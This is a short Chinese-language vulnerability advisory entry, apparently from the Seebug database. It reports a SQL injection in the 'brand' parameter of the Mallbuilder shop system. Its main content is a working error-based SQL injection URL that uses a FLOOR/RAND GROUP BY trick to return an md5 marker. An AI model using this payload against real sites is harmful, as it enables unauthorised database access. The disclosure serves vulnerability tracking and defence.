Mallbuilder商城系统 参数 brand SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

/?orderby=1&s=list&m=product&brand=' AND (SELECT 6071 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,md5(123),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and' ![](https://images.seebug.org/contribute/47e4a860-48bf-4251-8cf3-9f813ef6d969)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息